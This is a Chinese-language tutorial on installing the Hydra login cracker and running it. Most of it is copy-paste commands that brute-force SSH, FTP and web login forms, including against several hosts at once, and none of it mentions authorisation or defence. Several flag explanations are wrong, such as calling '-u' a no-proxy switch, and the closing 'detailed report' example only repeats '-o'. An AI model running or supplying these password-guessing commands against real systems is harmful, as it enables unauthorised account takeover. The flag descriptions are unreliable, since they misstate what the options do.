登录神器：Hydra 保姆级教程

sudo apt-get install hydra
 
# 源码安装：
sudo apt-get install build-essential
sudo apt-get install libssl-dev
wget https://github.com/vanhauser-thc/thc-hydra/archive/refs/heads/master.zip
unzip master.zip
cd thc-hydra-master
./configure
make
sudo make install

brew install hydra

hydra [options] target service

hydra -l root -P /path/to/passwords.txt ssh://192.168.1.100
 
# -l root：尝试使用用户名 root。
# -P /path/to/passwords.txt：从指定的密码文件中读取密码。
# ssh://192.168.1.100：目标主机和服务。

hydra -L /path/to/usernames.txt -P /path/to/passwords.txt ftp://192.168.1.100
 
# -L /path/to/usernames.txt：从指定的用户名文件中读取用户名。
# -P /path/to/passwords.txt：从指定的密码文件中读取密码。
# ftp://192.168.1.100：目标主机和服务。

hydra -l admin -P /path/to/passwords.txt 192.168.1.100 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"
 
# http-post-form：指定服务类型。
# /login.php:username=^USER^&password=^PASS^:F=incorrect：指定表单路径、参数和错误消息。

# 可以同时对多个目标进行攻击：
 
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt ftp://192.168.1.100 ftp://192.168.1.101

# -w 5：每次尝试之间等待 5 秒。
 
hydra -l root -P /path/to/passwords.txt -w 5 ssh://192.168.1.100

# -o output.txt：将结果保存到文件。
# -u：不使用代理。
 
hydra -l root -P /path/to/passwords.txt -o output.txt -u -f ssh://192.168.1.100

# 生成详细的报告，记录所有尝试和结果：
 
hydra -l root -P /path/to/passwords.txt -o output.txt ssh://192.168.1.100